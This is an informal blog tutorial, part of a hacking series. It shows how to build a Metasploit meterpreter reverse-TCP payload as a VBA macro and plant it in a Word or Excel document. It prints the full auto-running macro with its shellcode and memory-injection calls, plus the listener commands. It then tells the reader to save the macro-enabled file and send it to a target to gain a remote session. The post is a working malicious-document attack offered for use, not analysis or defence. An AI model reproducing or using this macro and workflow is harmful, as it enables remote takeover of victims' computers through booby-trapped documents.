Whoop Whoop Wazzup Guys.
Today the 2nd part of my serie.
The tool we're going to use today is ordinary metasploit.
Hopefully you know what metasploit is and how it works so let's
start. Fire up the msfconsole with the command msfconsolethe only 3
things you need are the LHOST LPORT and AutoRunScrip. The commands
are the following:
use windows/meterpreter/reverse_tcp
set LPORT 443
set AutoRunScript post/windows/manage/smart_migrate
set LHOST 192.168.x.x
And let's generate it with the command: generate -t vba
You will get an output like this:
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Nmignwz As Long, ByVal Jtklbyzu As Long, ByVal Fbxq As LongPtr, Irctne As Long, ByVal Xtjlc As Long, Fflilwsof As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Uvitzp As Long, ByVal Khnfa As Long, ByVal Ofhmpeaxv As Long, ByVal Jupfwuvu As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Nma As LongPtr, ByRef Psupt As Any, ByVal Lykogxg As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Nmignwz As Long, ByVal Jtklbyzu As Long, ByVal Fbxq As Long, Irctne As Long, ByVal Xtjlc As Long, Fflilwsof As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Uvitzp As Long, ByVal Khnfa As Long, ByVal Ofhmpeaxv As Long, ByVal Jupfwuvu As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Nma As Long, ByRef Psupt As Any, ByVal Lykogxg As Long) As Long
#EndIf
Sub Auto_Open()
Dim Xtvamqt As Long, Oxaudsqp As Variant, Zpkjfe As Long
#If Vba7 Then
Dim Juqhahfmi As LongPtr, Xpdodpp As LongPtr
#Else
Dim Juqhahfmi As Long, Xpdodpp As Long
#EndIf
Oxaudsqp = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1, _
199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81, _
139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _
207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36, _
1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36, _
91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,51,50,0, _
0,104,119,115,50,95,84,104,76,119,38,7,255,213,184,144,1,0,0,41, _
196,84,80,104,41,128,107,0,255,213,80,80,80,80,64,80,64,80,104,234, _
15,223,224,255,213,151,106,5,104,192,168,1,16,104,2,0,1,187,137,230, _
106,16,86,87,104,153,165,116,97,255,213,133,192,116,12,255,78,8,117,236, _
104,240,181,162,86,255,213,106,0,106,4,86,87,104,2,217,200,95,255,213, _
139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147, _
83,106,0,86,83,87,104,2,217,200,95,255,213,1,195,41,198,117,238,195 _
)
Juqhahfmi = VirtualAlloc(0, UBound(Oxaudsqp), &H1000, &H40)
For Zpkjfe = LBound(Oxaudsqp) To UBound(Oxaudsqp)
Xtvamqt = Oxaudsqp(Zpkjfe)
Xpdodpp = RtlMoveMemory(Juqhahfmi + Zpkjfe, Xtvamqt, 1)
Next Zpkjfe
Xpdodpp = CreateThread(0, 0, Juqhahfmi, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Okay cool now start a listener by using:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.x.x
set LPORT 443
exploit
And switch to a windows box and open microsoft word or microsoft exel. Go to the 'view' tab, select the macro's button
and then view macro's
Add a new macro (Just give it the name you want)and press create.
(You can do all this steps in one just Hit alt+F11).
Remove the things your document standard creates and paste in the generated macro code into the editor. Just close the macro editor and do one of the most important steps of this tutorial! Save the file as WhateverYouWant.docm (Macro-Enabled document) or WhateverYouWant.doc (Must be word 97-2003 Document!)
Press save and send your file to your target. Switch back to the system you're running your metasploit listener on.
And bam we got a session once again :)
I think i'm going to upload the next part tomorrow so see ya then Guys
Goodbye
@ClaimItToYou